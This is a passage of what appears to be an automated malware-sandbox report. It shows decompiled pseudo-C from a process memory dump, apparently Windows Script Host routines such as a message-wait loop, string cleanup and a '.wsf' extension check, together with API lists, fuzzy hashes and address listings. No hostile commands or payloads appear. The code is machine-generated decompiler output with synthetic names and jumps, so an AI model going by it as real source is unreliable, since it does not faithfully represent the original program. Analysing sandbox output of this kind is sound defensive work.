							_t94 =  *((intOrPtr*)( *_t128 + 0x10))(_t128,  &_v36,  &_v12,  &_v24);
							__eflags = _t94;
							if(_t94 < 0) {
								_t31 =  &_v24;
								 *_t31 = _v24 | 0xffffffff;
								__eflags =  *_t31;
								_v12 = 0;
							} else {
								 *((intOrPtr*)( *_t128 + 0x14))(_t128,  &_v8);
							}
							__eflags = _v8;
							if(__eflags == 0) {
								_v8 = E00B9220B( *((intOrPtr*)(_t132 + 0x40)), __eflags, _v12);
							}
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t132 + 0x2c)))) + 0x14))(_v12, _v24 + 1, _v80, _a4, _v8, _v56, 0);
							_t97 =  *((intOrPtr*)(_t132 + 0x2c));
							__eflags =  *(_t97 + 0x23);
							if( *(_t97 + 0x23) != 0) {
								E00B90ADF(_t132, _t128,  *((intOrPtr*)(_t132 + 0x40)), _v12);
							}
							goto L5;
						}
						__eflags =  *_t89;
						if( *_t89 != 0) {
							goto L22;
						}
						goto L20;
					}
					goto L5;
				}
			}




































                                                        0x00b8647b
                                                        0x00b8648b
                                                        0x00b86497
                                                        0x00b8649a
                                                        0x00b8649d
                                                        0x00b864a0
                                                        0x00b864a5
                                                        0x00b86501
                                                        0x00b86504
                                                        0x00b864a7
                                                        0x00b864a8
                                                        0x00b864b5
                                                        0x00b88bec
                                                        0x00b86500
                                                        0x00000000
                                                        0x00b86500
                                                        0x00b864bb
                                                        0x00b864c4
                                                        0x00b86507
                                                        0x00b8650a
                                                        0x00b88cb7
                                                        0x00b88cc0
                                                        0x00b88cc2
                                                        0x00b88cc4
                                                        0x00b864d4
                                                        0x00b864d7
                                                        0x00b864dd
                                                        0x00b864e2
                                                        0x00b864e7
                                                        0x00b864ec
                                                        0x00b864f1
                                                        0x00b864f3
                                                        0x00b864f8
                                                        0x00b88d41
                                                        0x00b88d41
                                                        0x00b864fe
                                                        0x00000000
                                                        0x00b864fe
                                                        0x00b88cd6
                                                        0x00b88cd8
                                                        0x00b88cda
                                                        0x00000000
                                                        0x00000000
                                                        0x00b88ce0
                                                        0x00b88cf8
                                                        0x00b88cfb
                                                        0x00b88d08
                                                        0x00b88d0a
                                                        0x00b88d0c
                                                        0x00b86512
                                                        0x00b86518
                                                        0x00b864d2
                                                        0x00b864d2
                                                        0x00000000
                                                        0x00b864d2
                                                        0x00000000
                                                        0x00b8651a
                                                        0x00b88d12
                                                        0x00b88d27
                                                        0x00b88d2a
                                                        0x00b88d2d
                                                        0x00b88d30
                                                        0x00b88d36
                                                        0x00b8651c
                                                        0x00b8651e
                                                        0x00b86520
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b86522
                                                        0x00000000
                                                        0x00b86510
                                                        0x00b864cc
                                                        0x00b88bf6
                                                        0x00b88bfc
                                                        0x00b88cae
                                                        0x00000000
                                                        0x00b88cae
                                                        0x00b88c02
                                                        0x00b88c05
                                                        0x00b88c08
                                                        0x00b88c0a
                                                        0x00b88c11
                                                        0x00b88c1b
                                                        0x00b88c1d
                                                        0x00b88c1f
                                                        0x00000000
                                                        0x00000000
                                                        0x00b88c28
                                                        0x00b88c2b
                                                        0x00b88c2e
                                                        0x00b88c3d
                                                        0x00b88c40
                                                        0x00b88c42
                                                        0x00b88c50
                                                        0x00b88c50
                                                        0x00b88c50
                                                        0x00b88c54
                                                        0x00b88c44
                                                        0x00b88c4b
                                                        0x00b88c4b
                                                        0x00b88c57
                                                        0x00b88c5a
                                                        0x00b88c67
                                                        0x00b88c67
                                                        0x00b88c84
                                                        0x00b88c87
                                                        0x00b88c8a
                                                        0x00b88c8d
                                                        0x00b88c9c
                                                        0x00b88c9c
                                                        0x00000000
                                                        0x00b88c8d
                                                        0x00b88c0c
                                                        0x00b88c0f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b88c0f
                                                        0x00000000
                                                        0x00b864cc

                                                        APIs
                                                          • Part of subcall function 00B86529: InterlockedExchange.KERNEL32(?,00000000), ref: 00B8652F
                                                        • SysFreeString.OLEAUT32(?), ref: 00B864DD
                                                        • SysFreeString.OLEAUT32(?), ref: 00B864E2
                                                        • SysFreeString.OLEAUT32(?), ref: 00B864E7
                                                        • SysFreeString.OLEAUT32(?), ref: 00B864EC
                                                        • SysFreeString.OLEAUT32(?), ref: 00B864F1
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: FreeString$ExchangeInterlocked
                                                        • String ID:
                                                        • API String ID: 4071441547-0
                                                        • Opcode ID: 7b32818e90e1b19f14332af923f46aecd068e3dcd93d62bc02b403918961d02c
                                                        • Instruction ID: 68dcd3565b8bffcea0d6fac8d206d6bbef64d2fc8d11c23a737a98bd28f3754d
                                                        • Opcode Fuzzy Hash: 7b32818e90e1b19f14332af923f46aecd068e3dcd93d62bc02b403918961d02c
                                                        • Instruction Fuzzy Hash: 24016171D0011DABCB20AF9ACC848AEBFBAEF90364B64456AE415A3270DB70AD05CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B824CF, Relevance: 7.5, APIs: 5, Instructions: 47windowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00B824CF(void* _a4, int _a8, long _a12, long _a16) {
				struct tagMSG _v32;
				long _t13;

				_t13 = MsgWaitForMultipleObjects(1,  &_a4, _a8, _a12, _a16);
				if(_t13 != 0xffffffff) {
					while(_t13 == 1) {
						while(PeekMessageA( &_v32, 0, 0, 0, 1) != 0) {
							TranslateMessage( &_v32);
							DispatchMessageA( &_v32);
						}
						_t13 = MsgWaitForMultipleObjects(1,  &_a4, _a8, _a12, _a16);
						if(_t13 != 0xffffffff) {
							continue;
						}
						goto L3;
					}
				}
				L3:
				return _t13;
			}





                                                        0x00b824ee
                                                        0x00b824f3
                                                        0x00b824fb
                                                        0x00b88461
                                                        0x00b88451
                                                        0x00b8845b
                                                        0x00b8845b
                                                        0x00b88481
                                                        0x00b8250d
                                                        0x00000000
                                                        0x00b8250f
                                                        0x00000000
                                                        0x00b8250d
                                                        0x00b824fb
                                                        0x00b82507
                                                        0x00b82507

                                                        APIs
                                                        • MsgWaitForMultipleObjects.USER32 ref: 00B824EE
                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00B8846C
                                                        • MsgWaitForMultipleObjects.USER32 ref: 00B88481
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: MultipleObjectsWait$MessagePeek
                                                        • String ID:
                                                        • API String ID: 653132895-0
                                                        • Opcode ID: aa62ee27ac784c66f35d475bcade56eafcc9c2d897ff0ff4d1f4e233f81dda76
                                                        • Instruction ID: f6c155900eeeb104e5d93f84bf87b7ba4286599459b4fa8a2953fa08e9c26d3b
                                                        • Opcode Fuzzy Hash: aa62ee27ac784c66f35d475bcade56eafcc9c2d897ff0ff4d1f4e233f81dda76
                                                        • Instruction Fuzzy Hash: 97012C7250014EBBDF01AFA4DC44DEF3BADEB44310F044511FA15D60A1DA71D952DBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B8651C, Relevance: 7.5, APIs: 5, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SysFreeString.OLEAUT32(?), ref: 00B864DD
                                                        • SysFreeString.OLEAUT32(?), ref: 00B864E2
                                                        • SysFreeString.OLEAUT32(?), ref: 00B864E7
                                                        • SysFreeString.OLEAUT32(?), ref: 00B864EC
                                                        • SysFreeString.OLEAUT32(?), ref: 00B864F1
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: FreeString
                                                        • String ID:
                                                        • API String ID: 3341692771-0
                                                        • Opcode ID: f576f9a88844a195d077d62014e66c3300830aa6c092ba082de27da7f5dea6b6
                                                        • Instruction ID: d9a4bd619c712481c84d948fb47064ef1f4f99a5d711a8d7c3d7ad3acf325bb8
                                                        • Opcode Fuzzy Hash: f576f9a88844a195d077d62014e66c3300830aa6c092ba082de27da7f5dea6b6
                                                        • Instruction Fuzzy Hash: 75E0BF36E000289BCF117B9ADC4589EBFB2EF903A576544B7D115A3270DA325D26DF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B82299, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 335COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 77%
                                                        			E00B82299(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				char _v12;
				char _v272;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				char _v289;
				char _v290;
				char _v291;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				char _v820;
				intOrPtr _v824;
				char _v825;
				char _v826;
				char _v827;
				char _v829;
				int _v831;
				char _v842;
				char _v844;
				char _v848;
				intOrPtr _v1372;
				char _v1396;
				intOrPtr _v1400;
				WCHAR* _v1404;
				void* __edi;
				void* __esi;
				signed int _t93;
				intOrPtr* _t100;
				void* _t110;
				intOrPtr _t111;
				int _t112;
				void* _t118;
				char _t124;
				void* _t129;
				intOrPtr _t130;
				int _t131;
				void* _t132;
				int _t134;
				intOrPtr _t137;
				intOrPtr _t145;
				int _t146;
				intOrPtr _t150;
				void* _t158;
				int _t160;
				intOrPtr* _t167;
				intOrPtr* _t193;
				signed int _t195;
				void* _t196;

				_t190 = __edx;
				_t158 = __ebx;
				_t93 =  *0xb97004; // 0xbb40e64e
				_v8 = _t93 ^ _t195;
				_t193 = __ecx;
				_v1400 = _a16;
				E00B8437C( &_v848, __eflags);
				_a8 = _a8 - 1;
				_t192 = _a12 + 4;
				_v1404 = _a12 + 4;
				if(E00B837F5() == 0) {
					E00B85D17(_t97,  &_v848);
					_t100 = 1;
					goto L27;
				} else {
					_t9 = _t193 + 0x260; // 0xb8246c
					_t192 = _t9;
					if(E00B8461D(_t97, _t9) >= 0) {
						E00B839B0( *_t192);
					}
					_push(_t158);
					if( *0xb97001 == 0) {
						_v12 = 0;
						_t104 = GetModuleFileNameA( *0xb9701c,  &_v272, 0x105);
						__eflags = _t104;
						if(_t104 == 0) {
							L29:
							E00B85D17(_t104,  &_v848);
							_t100 = 1;
							L26:
							_pop(_t158);
							L27:
							return E00B81335(_t100, _t158, _v8 ^ _t195, _t190, _t192, _t193);
						}
						__eflags = _v12;
						if(_v12 != 0) {
							goto L29;
						}
						_t58 = _t193 + 0x2c; // 0xb82238
						_t192 = _t58;
						_t160 = 0;
						_t104 = MultiByteToWideChar(0, 0,  &_v272, 0xffffffff, _t58, 0x105);
						__eflags = _t104;
						if(_t104 == 0) {
							goto L29;
						}
						L7:
						_t13 = _t193 + 0x10; // 0xb8221c
						_t14 = _t193 + 0xc; // 0xb82218
						_t110 = E00B8442A(_t192, _t14, _t13);
						_t206 = _t110 - _t160;
						_t167 = _t193;
						if(_t110 < _t160) {
							_push(_t110);
							_push(0xc80);
							L35:
							_t111 =  *0xb9702c; // 0x0
							_t190 =  *_t193;
							_t112 = _t111 + 0x14;
							__eflags = _t112;
							_t113 =  *((intOrPtr*)( *_t193))(_t112);
							L36:
							_t193 = 1;
							L25:
							E00B85D17(_t113,  &_v848);
							_t100 = _t193;
							goto L26;
						}
						E00B83FF7(_t167, _t206);
						_t207 = _a8 - _t160;
						if(_a8 == _t160) {
							_t193 =  *((intOrPtr*)( *_t193 + 0x1c))();
							goto L25;
						}
						E00B83732( &_v848, _a8, _v1404);
						_t118 = E00B83D3E( &_v848, _t207, 0x80000002);
						_t208 = _t118 - _t160;
						if(_t118 < _t160) {
							L38:
							_push(_t118);
							_push(0xc85);
							L39:
							goto L35;
						}
						_t192 = 0x80000001;
						_t118 = E00B83D3E( &_v848, _t208, 0x80000001);
						if(_t118 < _t160) {
							goto L38;
						}
						 *(_t193 + 0x20) = _v831;
						_t113 = E00B83C66( &_v848, _t190, 0x80000001);
						if(_t113 < _t160) {
							__eflags = _t113 - 0x8004ffff;
							if(_t113 == 0x8004ffff) {
								goto L36;
							}
							_push(_t113);
							_push(0xc87);
							goto L39;
						}
						 *(_t193 + 0x20) = _v831;
						 *((intOrPtr*)(_t193 + 8)) = _v848;
						 *((char*)(_t193 + 0x21)) = _v844;
						 *((char*)(_t193 + 0x23)) = _v829;
						_t124 = _v827;
						 *((char*)(_t193 + 0x24)) = _t124;
						 *((char*)(_t193 + 0x25)) = _v825;
						if(_t124 != 0) {
							__eflags = _v826;
							if(__eflags != 0) {
								 *((char*)(_t193 + 0x23)) = 1;
							}
						}
						_t36 = _t193 + 0x27; // 0xb8cd0700
						_t113 =  *_t36;
						if(_t113 != 0) {
							 *(_t193 + 0x20) = 1;
						}
						if(_v290 != 0) {
							__eflags = _t113;
							if(_t113 == 0) {
								 *(_t193 + 0x20) = _t113;
								__eflags = _v842 - _t113;
								if(_v842 != _t113) {
									 *((intOrPtr*)( *_t193 + 8))();
								}
								_t113 =  *((intOrPtr*)( *_t193 + 0xc))();
							}
							goto L49;
						} else {
							if(_v842 != 0) {
								 *((intOrPtr*)( *_t193 + 8))();
							}
							if(_v291 != 0) {
								E00B843C9( &_v1396);
								_t129 = E00B8F066( &_v1396, _t190, __eflags, _t192);
								__eflags = _t129 - _t160;
								if(_t129 < _t160) {
									L52:
									_push(0xc83);
									L53:
									_t130 =  *0xb9702c; // 0x0
									_t131 = _t130 + 0x14;
									__eflags = _t131;
									L54:
									_push(_t131);
									_t113 = E00B8F342(_t193);
									goto L36;
								}
								_t132 = E00B8FA22(_t160, _t192, _t193, _v1372);
								__eflags = _t132 - _t160;
								if(_t132 >= _t160) {
									_t113 =  *((intOrPtr*)( *_t193 + 0x10))(_t193, _t160, 0xbea);
									L49:
									_t193 = 0;
									goto L25;
								}
								goto L52;
							}
							_t113 = 0;
							if(_v292 != 0) {
								_t134 = E00B8F066( &_v848, _t190, __eflags, _t192);
								__eflags = _t134;
								if(_t134 < 0) {
									goto L52;
								}
								 *((intOrPtr*)( *_t193 + 0x10))(_t193, _t160, 0xbeb);
								_t196 = _t196 + 0xc;
								_t113 = 1;
							}
							if(_v289 != 0) {
								_t113 = E00B8FA22(_t160, _t192, _t193, _v824);
								__eflags = _t113;
								if(_t113 >= 0) {
									__eflags = _v300 - _t160;
									if(_v300 != _t160) {
										L66:
										_t113 = 1;
										goto L20;
									}
									__eflags = _v824 - 0x43;
									if(_v824 == 0x43) {
										_push(0xbed);
										L65:
										 *((intOrPtr*)( *_t193 + 0x10))(_t193, _t160);
										goto L66;
									}
									__eflags = _v824 - 0x57;
									if(_v824 != 0x57) {
										goto L36;
									}
									_push(0xbec);
									goto L65;
								}
								_push(0xc82);
								goto L53;
							}
							L20:
							_t182 = _v300;
							if(_v300 == _t160) {
								__eflags = _t113;
								if(_t113 != 0) {
									goto L49;
								}
								L68:
								_t137 =  *0xb9702c; // 0x0
								_push(0xce8);
								_t131 = _t137 + 0x15;
								goto L54;
							}
							if(_v820 == _t160) {
								goto L68;
							}
							if(_v280 != _t160) {
								_t192 = 0;
								__eflags = _v280 - _t160;
								if(_v280 <= _t160) {
									L24:
									_t50 = _t193 + 0x1c; // 0xb8cb0e
									_t193 =  *_t50;
									goto L25;
								} else {
									goto L74;
								}
								while(1) {
									L74:
									_t113 = E00B81F26(_t193, _t190,  &_v820, _v300 - 1, _v296 + 4, _v288,  *((intOrPtr*)(_v284 + _t192 * 4)), _v1400);
									__eflags = _t113 - _t160;
									if(_t113 < _t160) {
										__eflags =  *((char*)(_t193 + 0x22));
										if( *((char*)(_t193 + 0x22)) == 0) {
											 *((intOrPtr*)(_t193 + 0x1c)) = 1;
										}
										__eflags = _t113 - 0x8004ffff;
										if(_t113 != 0x8004ffff) {
											_t190 =  *_t193;
											_t145 =  *0xb9702c; // 0x0
											_t146 = _t145 + 0x14;
											__eflags = _t146;
											_t113 =  *((intOrPtr*)( *_t193))(_t146, 0xc87, _t113);
										}
									}
									_t192 =  &(_t192[0]);
									__eflags = _t192 - _v280;
									if(_t192 >= _v280) {
										goto L24;
									}
								}
								goto L24;
							}
							_t113 = E00B81F26(_t193, _t190,  &_v820, _t182 - 1, _v296 + 4, _v288, _t160, _v1400);
							if(_t113 < _t160) {
								__eflags =  *((char*)(_t193 + 0x22));
								if( *((char*)(_t193 + 0x22)) == 0) {
									 *((intOrPtr*)(_t193 + 0x1c)) = 1;
								}
								__eflags = _t113 - 0x8004ffff;
								if(_t113 != 0x8004ffff) {
									_t190 =  *_t193;
									_t150 =  *0xb9702c; // 0x0
									_t113 =  *((intOrPtr*)( *_t193))(_t150 + 0x14, 0xc87, _t113);
								}
							}
							goto L24;
						}
					}
					_t10 = _t193 + 0x2c; // 0xb82238
					_t192 = _t10;
					 *((short*)(_t193 + 0x234)) = 0;
					if(GetModuleFileNameW( *0xb9701c, _t10, 0x105) == 0) {
						goto L29;
					}
					_t104 = 0;
					_t12 = _t193 + 0x234; // 0x5c60850f
					if(0 !=  *_t12) {
						goto L29;
					} else {
						_t160 = 0;
						goto L7;
					}
				}
			}





















































                                                        0x00b82299
                                                        0x00b82299
                                                        0x00b822a4
                                                        0x00b822ab
                                                        0x00b822b2
                                                        0x00b822be
                                                        0x00b822c4
                                                        0x00b822c9
                                                        0x00b822cc
                                                        0x00b822cf
                                                        0x00b822dc
                                                        0x00b87f64
                                                        0x00b87f6b
                                                        0x00000000
                                                        0x00b822e2
                                                        0x00b822e2
                                                        0x00b822e2
                                                        0x00b822f0
                                                        0x00b822f4
                                                        0x00b822f4
                                                        0x00b82300
                                                        0x00b82301
                                                        0x00b87f97
                                                        0x00b87f9b
                                                        0x00b87fa1
                                                        0x00b87fa3
                                                        0x00b87f71
                                                        0x00b87f77
                                                        0x00b87f7e
                                                        0x00b824b9
                                                        0x00b824b9
                                                        0x00b824ba
                                                        0x00b824c7
                                                        0x00b824c7
                                                        0x00b87fa5
                                                        0x00b87fa9
                                                        0x00000000
                                                        0x00000000
                                                        0x00b87fac
                                                        0x00b87fac
                                                        0x00b87fb9
                                                        0x00b87fbd
                                                        0x00b87fc3
                                                        0x00b87fc5
                                                        0x00000000
                                                        0x00000000
                                                        0x00b8233e
                                                        0x00b8233e
                                                        0x00b82342
                                                        0x00b82347
                                                        0x00b8234c
                                                        0x00b8234e
                                                        0x00b82350
                                                        0x00b87fcc
                                                        0x00b87fcd
                                                        0x00b87fd2
                                                        0x00b87fd2
                                                        0x00b87fd7
                                                        0x00b87fd9
                                                        0x00b87fd9
                                                        0x00b87fdd
                                                        0x00b87fdf
                                                        0x00b87fe1
                                                        0x00b824ac
                                                        0x00b824b2
                                                        0x00b824b7
                                                        0x00000000
                                                        0x00b824b7
                                                        0x00b82356
                                                        0x00b8235b
                                                        0x00b8235e
                                                        0x00b87fee
                                                        0x00000000
                                                        0x00b87fee
                                                        0x00b82373
                                                        0x00b82383
                                                        0x00b82388
                                                        0x00b8238a
                                                        0x00b87ff5
                                                        0x00b87ff5
                                                        0x00b87ff6
                                                        0x00b87ffb
                                                        0x00000000
                                                        0x00b87ffb
                                                        0x00b82390
                                                        0x00b8239c
                                                        0x00b823a3
                                                        0x00000000
                                                        0x00000000
                                                        0x00b823b5
                                                        0x00b823b8
                                                        0x00b823bf
                                                        0x00b87fff
                                                        0x00b88004
                                                        0x00000000
                                                        0x00000000
                                                        0x00b88006
                                                        0x00b88007
                                                        0x00000000
                                                        0x00b88007
                                                        0x00b823d1
                                                        0x00b823da
                                                        0x00b823e3
                                                        0x00b823ec
                                                        0x00b823ef
                                                        0x00b823f5
                                                        0x00b823f8
                                                        0x00b823fd
                                                        0x00b8800e
                                                        0x00b88015
                                                        0x00b8801b
                                                        0x00b8801b
                                                        0x00b88015
                                                        0x00b82403
                                                        0x00b82403
                                                        0x00b82408
                                                        0x00b88024
                                                        0x00b88024
                                                        0x00b82415
                                                        0x00b8802d
                                                        0x00b8802f
                                                        0x00b88031
                                                        0x00b88034
                                                        0x00b8803a
                                                        0x00b88040
                                                        0x00b88040
                                                        0x00b88047
                                                        0x00b88047
                                                        0x00000000
                                                        0x00b8241b
                                                        0x00b82422
                                                        0x00b82428
                                                        0x00b82428
                                                        0x00b82432
                                                        0x00b88057
                                                        0x00b88063
                                                        0x00b88068
                                                        0x00b8806a
                                                        0x00b8807b
                                                        0x00b8807b
                                                        0x00b88080
                                                        0x00b88080
                                                        0x00b88085
                                                        0x00b88085
                                                        0x00b88088
                                                        0x00b88088
                                                        0x00b8808b
                                                        0x00000000
                                                        0x00b8808b
                                                        0x00b88072
                                                        0x00b88077
                                                        0x00b88079
                                                        0x00b8809e
                                                        0x00b8804a
                                                        0x00b8804a
                                                        0x00000000
                                                        0x00b8804a
                                                        0x00000000
                                                        0x00b88079
                                                        0x00b82438
                                                        0x00b82440
                                                        0x00b880ad
                                                        0x00b880b2
                                                        0x00b880b4
                                                        0x00000000
                                                        0x00000000
                                                        0x00b880bf
                                                        0x00b880c2
                                                        0x00b880c5
                                                        0x00b880c5
                                                        0x00b8244d
                                                        0x00b880d2
                                                        0x00b880d7
                                                        0x00b880d9
                                                        0x00b880e2
                                                        0x00b880e8
                                                        0x00b88116
                                                        0x00b88116
                                                        0x00000000
                                                        0x00b88116
                                                        0x00b880ea
                                                        0x00b880f1
                                                        0x00b88107
                                                        0x00b8810c
                                                        0x00b88110
                                                        0x00000000
                                                        0x00b88113
                                                        0x00b880f3
                                                        0x00b880fa
                                                        0x00000000
                                                        0x00000000
                                                        0x00b88100
                                                        0x00000000
                                                        0x00b88100
                                                        0x00b880db
                                                        0x00000000
                                                        0x00b880db
                                                        0x00b82453
                                                        0x00b82453
                                                        0x00b8245b
                                                        0x00b8811d
                                                        0x00b8811f
                                                        0x00000000
                                                        0x00000000
                                                        0x00b88125
                                                        0x00b88125
                                                        0x00b8812a
                                                        0x00b8812f
                                                        0x00000000
                                                        0x00b8812f
                                                        0x00b82468
                                                        0x00000000
                                                        0x00000000
                                                        0x00b82474
                                                        0x00b88169
                                                        0x00b8816b
                                                        0x00b88171
                                                        0x00b824a9
                                                        0x00b824a9
                                                        0x00b824a9
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b88177
                                                        0x00b88177
                                                        0x00b881a8
                                                        0x00b881ad
                                                        0x00b881af
                                                        0x00b881b1
                                                        0x00b881b5
                                                        0x00b881b7
                                                        0x00b881b7
                                                        0x00b881be
                                                        0x00b881c3
                                                        0x00b881c5
                                                        0x00b881c8
                                                        0x00b881d2
                                                        0x00b881d2
                                                        0x00b881d8
                                                        0x00b881d8
                                                        0x00b881c3
                                                        0x00b881da
                                                        0x00b881db
                                                        0x00b881e1
                                                        0x00000000
                                                        0x00000000
                                                        0x00b881e7
                                                        0x00000000
                                                        0x00b88177
                                                        0x00b8249c
                                                        0x00b824a3
                                                        0x00b88137
                                                        0x00b8813b
                                                        0x00b8813d
                                                        0x00b8813d
                                                        0x00b88144
                                                        0x00b88149
                                                        0x00b8814f
                                                        0x00b88152
                                                        0x00b88162
                                                        0x00b88162
                                                        0x00b88149
                                                        0x00000000
                                                        0x00b824a3
                                                        0x00b82415
                                                        0x00b8230e
                                                        0x00b8230e
                                                        0x00b82312
                                                        0x00b82327
                                                        0x00000000
                                                        0x00000000
                                                        0x00b8232d
                                                        0x00b8232f
                                                        0x00b82336
                                                        0x00000000
                                                        0x00b8233c
                                                        0x00b8233c
                                                        0x00000000
                                                        0x00b8233c
                                                        0x00b82336

                                                        APIs
                                                          • Part of subcall function 00B837F5: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00B8380C
                                                          • Part of subcall function 00B837F5: GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00B83822
                                                          • Part of subcall function 00B837F5: FreeLibrary.KERNEL32(00000000), ref: 00B83836
                                                          • Part of subcall function 00B8461D: ??2@YAPAXI@Z.MSVCRT ref: 00B84624
                                                        • GetModuleFileNameW.KERNEL32(00B82238,00000105,00000000,00B8246C,00000001,?), ref: 00B8231F
                                                          • Part of subcall function 00B839B0: CoRegisterMessageFilter.OLE32(?,?), ref: 00B839BA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Library$??2@AddressFileFilterFreeLoadMessageModuleNameProcRegister
                                                        • String ID: W
                                                        • API String ID: 1557387897-655174618
                                                        • Opcode ID: fef41a2c501de93e619ffb650cf66219fe16d855c3c02f940c46bf4efdf1de36
                                                        • Instruction ID: c339bac17fa468e1e3ef42ee0a5e99992c985b20bc024cc954fbb7e17ebb7438
                                                        • Opcode Fuzzy Hash: fef41a2c501de93e619ffb650cf66219fe16d855c3c02f940c46bf4efdf1de36
                                                        • Instruction Fuzzy Hash: 47C1B3719081949FDB31BF24CC84BAAB7F8AF05304F1445E9E54AA7261DF30AE85CF61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B81F26, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 39%
                                                        			E00B81F26(intOrPtr* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24) {
				signed int _v8;
				char _v528;
				signed int _v532;
				signed int _v536;
				intOrPtr* _v540;
				intOrPtr _v544;
				char _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t40;
				void* _t43;
				intOrPtr _t44;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t60;
				intOrPtr* _t62;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t69;
				intOrPtr _t72;
				intOrPtr _t81;
				intOrPtr* _t88;
				intOrPtr* _t90;
				intOrPtr _t94;
				intOrPtr* _t95;
				void* _t96;
				intOrPtr* _t97;
				intOrPtr* _t98;
				intOrPtr* _t99;
				signed int _t100;

				_t92 = __edx;
				_t40 =  *0xb97004; // 0xbb40e64e
				_v8 = _t40 ^ _t100;
				_v536 = _v536 & 0x00000000;
				_v532 = _v532 & 0x00000000;
				_t72 = _a16;
				_t99 = __ecx;
				_t94 = _a4;
				_v544 = _a20;
				_v540 = _a24;
				_t43 = E00B844E0(__ecx, __edx, _a8, _a12);
				if(_t43 < 0) {
					L26:
					_t92 =  *_t99;
					_t44 =  *0xb9702c; // 0x0
					_t46 =  *((intOrPtr*)( *_t99))(_t44 + 0x14, 0xc80, _t43);
					L32:
					_t95 = _t46;
					L14:
					if(_t95 < 0) {
						L18:
						__eflags = _t95 - 0x8004ffff;
						if(_t95 != 0x8004ffff) {
							__eflags = _t95 - 0x80020101;
							if(_t95 == 0x80020101) {
								goto L15;
							}
							L40:
							_t81 =  *0xb9702c; // 0x0
							_t95 =  *((intOrPtr*)( *_t99))(_t81 + 0x14, 0xc86, _t95);
							goto L15;
						}
					}
					L15:
					_t47 = _v536;
					if(_t47 != 0) {
						 *((intOrPtr*)( *_t47 + 8))(_t47);
					}
					__imp__#6(_v532);
					_pop(_t96);
					return E00B81335(_t95, _t72, _v8 ^ _t100, _t92, _t96, _t99);
				}
				_t43 = E00B83B1E(__edx, _t94, 0x104,  &_v528,  &_v548);
				if(_t43 < 0) {
					goto L26;
				}
				_t97 = __imp__#2;
				_t56 =  *_t97( &_v528);
				 *((intOrPtr*)(_t99 + 0x238)) = _t56;
				if(_t56 == 0) {
					L27:
					_t95 = 0x8007000e;
					goto L40;
				}
				_t57 =  *_t97(_v548);
				 *((intOrPtr*)(_t99 + 0x23c)) = _t57;
				if(_t57 == 0) {
					goto L27;
				}
				_t95 = E00B828D9(_t72, _t99, __edx, _t72);
				if(_t95 < 0) {
					__eflags = _t95 - 0x8004ffff;
					if(_t95 == 0x8004ffff) {
						goto L14;
					}
					_t98 = E00B83D0D( *((intOrPtr*)(_t99 + 0x238)), 0x2e);
					__eflags = _t98;
					if(_t98 == 0) {
						_push( *((intOrPtr*)(_t99 + 0x238)));
						_push(0xcea);
						L38:
						_t60 =  *0xb9702c; // 0x0
						_push(_t60 + 0x15);
						_t62 = E00B8F321(_t99);
						L12:
						_t95 = _t62;
						if(_t95 < 0) {
							goto L18;
						}
						_t95 = 0;
						goto L14;
					}
					_t63 = E00B82753(_t98, L".wsf", 0xffffffff);
					__eflags = _t63;
					if(_t63 != 0) {
						_push(_t98);
						_push(0xced);
						goto L38;
					}
					_t64 = _v540;
					__eflags = _t64;
					if(_t64 != 0) {
						_v536 = _t64;
						 *((intOrPtr*)( *_t64 + 4))(_t64);
						L25:
						_t62 = E00B866C1(_t99, _v536, _v544);
						goto L12;
					}
					_t95 = E00B86E2B(0,  *((intOrPtr*)(_t99 + 0x238)),  &_v536);
					__eflags = _t95;
					if(_t95 < 0) {
						goto L18;
					}
					goto L25;
				}
				_t106 = _v540;
				_t88 = _t99;
				_push( &_v532);
				if(_v540 != 0) {
					_push(_v540);
					_t69 = E00B9041E(_t88);
				} else {
					_t69 = E00B85497(_t72, _t88, _t92, _t106);
				}
				if(_t69 < 0) {
					__eflags = _t69 - 0x800c0005;
					if(_t69 == 0x800c0005) {
						_t69 = 0x80070002;
					}
					_t46 = E00B8F362(_t99, _t69);
					goto L32;
				} else {
					_push(_v532);
					_t90 = _t99;
					if( *((char*)(_t99 + 0x26)) == 0) {
